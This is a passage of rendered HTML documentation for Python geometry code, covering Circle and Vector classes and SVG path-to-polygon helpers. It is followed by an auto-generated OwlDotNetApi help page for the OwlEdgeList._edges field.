class='section' id='section-19'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-19'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">return</span> <span class="s">&#39;&lt;Circle x=</span><span class="si">%.1f</span><span class="s">, y=</span><span class="si">%.1f</span><span class="s">, id=</span><span class="si">%s</span><span class="s">, val=</span><span class="si">%f</span><span class="s"> &gt;&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">id</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">value</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-20'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-20'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">sqdist</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">circ</span><span class="p">):</span> <span class="n">dx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">circ</span><span class="o">.</span><span class="n">x</span> <span class="n">dy</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">circ</span><span class="o">.</span><span class="n">y</span> <span class="k">return</span> <span class="n">dx</span> <span class="o">*</span> <span class="n">dx</span> <span class="o">+</span> <span class="n">dy</span> <span class="o">*</span> <span class="n">dy</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-21'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-21'>#</a> </div> <p>been too lazy to code this myself, instead I took code from here http://www.kokkugia.com/wiki/index.php5?title=Python_vector_class</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">sqdist_o</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">circ</span><span class="p">):</span> <span class="n">dx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">ox</span> <span class="o">-</span> <span class="n">circ</span><span class="o">.</span><span class="n">x</span> <span class="n">dy</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">oy</span> <span class="o">-</span> <span class="n">circ</span><span class="o">.</span><span class="n">y</span> <span class="k">return</span> <span class="n">dx</span> <span class="o">*</span> <span class="n">dx</span> <span class="o">+</span> <span class="n">dy</span> <span class="o">*</span> <span class="n">dy</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-22'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-22'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-23'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-23'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre><span class="k">class</span> <span class="nc">Vector</span><span class="p">:</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-24'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-24'>#</a> </div> <p>Class properties</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">y</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-25'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-25'>#</a> </div> <p>represent as a string</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">__repr__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">return</span> <span class="s">&#39;Vector(</span><span class="si">%s</span><span class="s">, </span><span class="si">%s</span><span class="s">)&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="sd">&#39;&#39;&#39;</span> <span class="sd"> Class Methods / Behaviours</span> <span class="sd"> &#39;&#39;&#39;</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-26'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-26'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">zero</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="mf">0.0</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="mf">0.0</span> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-27'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-27'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">clone</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">Vector</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-28'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-28'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">normalize</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">math</span> <span class="kn">import</span> <span class="n">sqrt</span> <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="k">return</span> <span class="bp">self</span> <span class="n">norm</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="mf">1.0</span> <span class="o">/</span> <span class="n">sqrt</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">))</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*=</span> <span class="n">norm</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*=</span> <span class="n">norm</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-29'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-29'>#</a> </div> <p>self.z *= norm</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-30'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-30'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">invert</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="o">-</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="o">-</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-31'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-31'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">resize</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">sizeFactor</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">normalize</span> <span class="bp">self</span><span class="o">.</span><span class="n">scale</span><span class="p">(</span><span class="n">sizeFactor</span><span class="p">)</span> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-32'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-32'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">minus</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">-=</span> <span class="n">t</span><span class="o">.</span><span class="n">x</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">-=</span> <span class="n">t</span><span class="o">.</span><span class="n">y</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-33'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-33'>#</a> </div> <p>self.z -= t.z</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-34'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-34'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">plus</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">+=</span> <span class="n">t</span><span class="o">.</span><span class="n">x</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">+=</span> <span class="n">t</span><span class="o">.</span><span class="n">y</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-35'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-35'>#</a> </div> <p>self.z += t.z</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-36'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-36'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">roundToInt</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-37'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-37'>#</a> </div> <p>Returns the squared length of this vector.</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">lengthSquared</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">return</span> <span class="nb">float</span><span class="p">((</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">)</span> <span class="o">+</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">))</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-38'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-38'>#</a> </div> <p>Returns the length of this vector.</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">length</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">math</span> <span class="kn">import</span> <span class="n">sqrt</span> <span class="k">return</span> <span class="nb">float</span><span class="p">(</span><span class="n">sqrt</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">))</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-39'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-39'>#</a> </div> <p>Computes the dot product of this vector and vector v2</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">dot</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">v2</span><span class="p">):</span> <span class="k">return</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*</span> <span class="n">v2</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*</span> <span class="n">v2</span><span class="o">.</span><span class="n">y</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-40'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-40'>#</a> </div> <p>Linearly interpolates between vectors v1 and v2 and returns the result point = (1-alpha)<em>v1 + alpha</em>v2.</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">interpolate</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">v2</span><span class="p">,</span> <span class="n">alpha</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">=</span> <span class="nb">float</span><span class="p">((</span><span class="mi">1</span> <span class="o">-</span> <span class="n">alpha</span><span class="p">)</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">alpha</span> <span class="o">*</span> <span class="n">v2</span><span class="o">.</span><span class="n">x</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">=</span> <span class="nb">float</span><span class="p">((</span><span class="mi">1</span> <span class="o">-</span> <span class="n">alpha</span><span class="p">)</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">+</span> <span class="n">alpha</span> <span class="o">*</span> <span class="n">v2</span><span class="o">.</span><span class="n">y</span><span class="p">)</span> <span class="k">return</span> <span class="n">Vector</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">x</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-41'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-41'>#</a> </div> <p>Returns the angle in radians between this vector and the vector parameter; the return value is constrained to the range [0,PI].</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">angle</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">v2</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">math</span> <span class="kn">import</span> <span class="n">acos</span> <span class="n">vDot</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">dot</span><span class="p">(</span><span class="n">v2</span><span class="p">)</span> <span class="o">/</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">length</span><span class="p">()</span> <span class="o">*</span> <span class="n">v2</span><span class="o">.</span><span class="n">length</span><span class="p">())</span> <span class="k">if</span> <span class="n">vDot</span> <span class="o">&lt;</span> <span class="o">-</span><span class="mf">1.0</span><span class="p">:</span> <span class="n">vDot</span> <span class="o">=</span> <span class="o">-</span><span class="mf">1.0</span> <span class="k">if</span> <span class="n">vDot</span> <span class="o">&gt;</span> <span class="mf">1.0</span><span class="p">:</span> <span class="n">vDot</span> <span class="o">=</span> <span class="mf">1.0</span> <span class="k">return</span> <span class="nb">float</span><span class="p">(</span><span class="n">acos</span><span class="p">(</span><span class="n">vDot</span><span class="p">))</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-42'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-42'>#</a> </div> <p>Limits this vector to a given size. NODEBOX USERS: name should change as 'size' and 'scale' are reserved words in Nodebox!</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">limit</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="k">if</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">length</span><span class="p">()</span> <span class="o">&gt;</span> <span class="n">size</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">normalize</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">scale</span><span class="p">(</span><span class="n">size</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-43'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-43'>#</a> </div> <p>Point Methods Returns the square of the distance between this tuple and tuple t1.</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">distanceSquared</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t1</span><span class="p">):</span> <span class="n">dx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">t1</span><span class="o">.</span><span class="n">x</span> <span class="n">dy</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">t1</span><span class="o">.</span><span class="n">y</span> <span class="k">return</span> <span class="p">(</span><span class="n">dx</span> <span class="o">*</span> <span class="n">dx</span> <span class="o">+</span> <span class="n">dy</span> <span class="o">*</span> <span class="n">dy</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-44'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-44'>#</a> </div> <p>NODEBOX USERS: name should change as 'scale' is reserved word in Nodebox!</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">scale</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">s</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">*=</span> <span class="n">s</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">*=</span> <span class="n">s</span> <span class="k">return</span> <span class="bp">self</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-45'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-45'>#</a> </div> <p>NODEBOX USERS: name should change as 'translate' is reserved word in Nodebox!</p> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">translate</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">vec</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">plus</span><span class="p">(</span><span class="n">vec</span><span class="p">)</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-46'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-46'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="k">def</span> <span class="nf">distance</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">pt</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">math</span> <span class="kn">import</span> <span class="n">sqrt</span> <span class="n">dx</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">x</span> <span class="o">-</span> <span class="n">pt</span><span class="o">.</span><span class="n">x</span> <span class="n">dy</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">y</span> <span class="o">-</span> <span class="n">pt</span><span class="o">.</span><span class="n">y</span> <span class="k">return</span> <span class="nb">float</span><span class="p">(</span><span class="n">sqrt</span><span class="p">(</span><span class="n">dx</span> <span class="o">*</span> <span class="n">dx</span> <span class="o">+</span> <span class="n">dy</span> <span class="o">*</span> <span class="n">dy</span><span class="p">))</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-47'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-47'>#</a> </div> <p>restores a list of polygons from a SVG path string</p> </div> <div class='code'> <div class="highlight"><pre><span class="k">def</span> <span class="nf">restore_poly_from_path_str</span><span class="p">(</span><span class="n">path_str</span><span class="p">):</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-48'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-48'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="n">contours</span> <span class="o">=</span> <span class="n">path_str</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">&#39;Z&#39;</span><span class="p">)</span> <span class="c"># last contour may be empty</span> <span class="kn">from</span> <span class="nn">Polygon</span> <span class="kn">import</span> <span class="n">Polygon</span> <span class="k">as</span> <span class="n">Poly</span> <span class="n">poly</span> <span class="o">=</span> <span class="n">Poly</span><span class="p">()</span> <span class="k">for</span> <span class="n">c_str</span> <span class="ow">in</span> <span class="n">contours</span><span class="p">:</span> <span class="k">if</span> <span class="n">c_str</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="o">!=</span> <span class="s">&quot;&quot;</span><span class="p">:</span> <span class="n">pts_str</span> <span class="o">=</span> <span class="n">c_str</span><span class="o">.</span><span class="n">strip</span><span class="p">()[</span><span class="mi">1</span><span class="p">:]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">&quot;L&quot;</span><span class="p">)</span> <span class="n">pts</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">pt_str</span> <span class="ow">in</span> <span class="n">pts_str</span><span class="p">:</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="nb">float</span><span class="p">,</span> <span class="n">pt_str</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">&#39;,&#39;</span><span class="p">))</span> <span class="n">pts</span><span class="o">.</span><span class="n">append</span><span class="p">((</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">))</span> <span class="n">poly</span><span class="o">.</span><span class="n">addContour</span><span class="p">(</span><span class="n">pts</span><span class="p">,</span> <span class="n">is_clockwise</span><span class="p">(</span><span class="n">pts</span><span class="p">))</span> <span class="k">return</span> <span class="n">poly</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-49'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-49'>#</a> </div> <p>returns true if a given polygon is in clockwise order</p> </div> <div class='code'> <div class="highlight"><pre><span class="k">def</span> <span class="nf">is_clockwise</span><span class="p">(</span><span class="n">pts</span><span class="p">):</span></pre></div> </div> </div> <div class='clearall'></div> <div class='section' id='section-50'> <div class='docs'> <div class='octowrap'> <a class='octothorpe' href='#section-50'>#</a> </div> </div> <div class='code'> <div class="highlight"><pre> <span class="n">s</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">pts</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> <span class="k">if</span> <span class="s">&#39;x&#39;</span> <span class="ow">in</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span><span class="p">]:</span> <span class="n">x1</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">.</span><span class="n">x</span> <span class="n">y1</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="o">.</span><span class="n">y</span> <span class="n">x2</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">x</span> <span class="n">y2</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">y</span> <span class="k">else</span><span class="p">:</span> <span class="n">x1</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="n">x2</span><span class="p">,</span> <span class="n">y2</span> <span class="o">=</span> <span class="n">pts</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="n">s</span> <span class="o">+=</span> <span class="p">(</span><span class="n">x2</span> <span class="o">-</span> <span class="n">x1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">y2</span> <span class="o">+</span> <span class="n">y1</span><span class="p">)</span> <span class="k">return</span> <span class="n">s</span> <span class="o">&gt;=</span> <span class="mi">0</span> </pre></div> </div> </div> <div class='clearall'></div> </div> </body>
source/OwlDotNetApi/doc/owldotnetapi/OwlDotNetApi.OwlEdgeList._edges.html
bpellens/owldotnetapi
<html dir="LTR"> <head> <meta http-equiv="Content-Type" content="text/html; charset=Windows-1252" /> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5" /> <title>OwlEdgeList._edges Field</title> <xml> </xml> <link rel="stylesheet" type="text/css" href="MSDN.css" /> </head> <body id="bodyID" class="dtBODY"> <div id="nsbanner"> <div id="bannerrow1"> <table class="bannerparthead" cellspacing="0"> <tr id="hdr"> <td class="runninghead">OwlDotNetApi Documentation</td> <td class="product"> </td> </tr> </table> </div> <div id="TitleRow"> <h1 class="dtH1">OwlEdgeList._edges Field </h1> </div> </div> <div id="nstext"> <p> An arraylist of edges </p> <div class="syntax">protected <a href="ms-help://MS.NETFrameworkSDKv1.1/cpref/html/frlrfSystemCollectionsArrayListClassTopic.htm">ArrayList</a> _edges;</div> <p> </p> <h4 class="dtH4">See Also</h4> <p> <a href="OwlDotNetApi.OwlEdgeList.html">OwlEdgeList Class</a> | <a href="OwlDotNetApi.html">OwlDotNetApi Namespace</a></p> <object type="application/x-oleobject" classid="clsid:1e2a7bd0-dab9-11d0-b93a-00c04fc99f9e" viewastext="true" style="display: none;"> <param name="Keyword" value="_edges field"> </param> <param name="Keyword" value="_edges field, OwlEdgeList class"> </param> <param name="Keyword" value="OwlEdgeList._edges field"> </param> </object> </div> </body> </html>